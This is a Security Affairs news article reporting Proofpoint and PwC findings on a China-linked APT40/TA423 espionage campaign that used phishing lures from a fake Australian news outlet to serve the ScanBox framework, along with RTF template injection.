China-linked APT40 used ScanBox Framework in long-running spy campaignSecurity Affairs

Experts have uncovered a cyber espionage campaign by a China-linked APT group targeting several entities in the South China Sea.

Proofpoint’s Threat Research team has uncovered a cyber espionage campaign targeting entities across the globe, orchestrated by a China-linked threat actor. The campaign targeted entities in Australia, Malaysia and Europe, as well as organizations operating in the South China Sea.

Proofpoint analyzed the campaign with the help of PwC threat intelligence researchers.

The campaign was active from April 2022 to June, the threat actor was observed providing the ScanBox exploit framework to target visitors to a rogue Australian news website.

Researchers attribute the campaign to the China-linked APT group tracked as TA423/Red Ladon.

TA423 is a China-linked cyber espionage group that has been active since 2013, it focuses on political events in the Asia-Pacific region, particularly the South China Sea. Over the years, the group has hit defense contractors, manufacturers, universities, government agencies, law firms involved in diplomatic disputes and foreign companies involved in Australasian politics or operations in the South China Sea. .

“The joint efforts of Proofpoint and PwC researchers provide a moderate confidence assessment that recent campaigns targeting the federal government, energy, and manufacturing sectors globally may represent recent efforts by TA423/Red Ladon .” read the report published by the experts.

“The activity that overlaps with this threat actor has been publicly referred to in government indictments as ‘APT40’ and ‘Leviathan’.

In June 2021, the US Department of Justice (DoJ) indicted four members of China-linked cyber espionage group APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan) with hacking into dozens of government organizations, private companies and universities around the world. between 2011 and 2018.

Recent ScanBox-related phishing campaigns were conducted between April 2022 and June 2022 and primarily targeted Australian local and federal government agencies, Australian news media companies and global heavy industry manufacturers who service wind turbine fleets in the South China Sea.

Scanbox APT related to China

The phishing messages originated from Gmail and Outlook email addresses likely created by the threat actor and used multiple subject lines, including “Sick leave”, “Looking for users” and “Request for cooperation”. With the attacker posing as an employee of the fictitious media publication “Australian Morning News”, the messages attempt to trick recipients into visiting a link to a rogue domain that served the ScanBox framework.

“The malicious URLs provided in the emails also appear to use custom values ​​for each target, although they all redirect to the same page and serve the same malicious payload. In one instance, the threat actor was observed adding the URI extension “?p=23-<##>”. It appears that p=23 specifies the value of the landing page the user is redirected to, while the number string following it, e.g. the “11” in “?p=23-11″, appears to be a unique identifier for each recipient.” continues the report. “Proofpoint had also observed vanity URLs and separate URL redirect destinations for each target, in TA423’s previous campaigns in March 2022.”

ScanBox allows JavaScript code to be delivered as a single block or as a modular plugin-based architecture.

ScanBox can be used to harvest victim information to deliver next stage payloads to targets, it has been used by several China-related APT groups ([1], [2], [3], [4], [5]) in the past, including Stone Panda APT, TA413, and LuckyMouse.

ScanBox was able to provide several plugins as part of the attack, the latest plugin it provides to targets checks if Kaspersky Internet Security (KIS) is installed on the victim machine.

The researchers also correlated this campaign with previous campaigns orchestrated by the TA423 APT group that leveraged RTF template injection.

RTF documents were used to drop the first stage downloader on the victim’s systems, experts observed that the RTF template injection URL returned a weaponized Microsoft Word document.

“The RTF template injection URL returned a Microsoft Word document loaded with macros. The macro contains a series of hard-coded hexadecimal bytes stored as strings. These strings are reassembled by the macro and converted into two files , a PE, and a DLL, which are registered on the victim host and executed.The macro also makes a URL request apparently to return an “UpdateConfig” value that can be used by the final installed payload.The report continues.

Proofpoint researchers conclude that this latest ScanBox campaign is part of a larger caber espionage operation conducted by APT40 since March 2021.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(Security cases hacking, ScanBox)

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button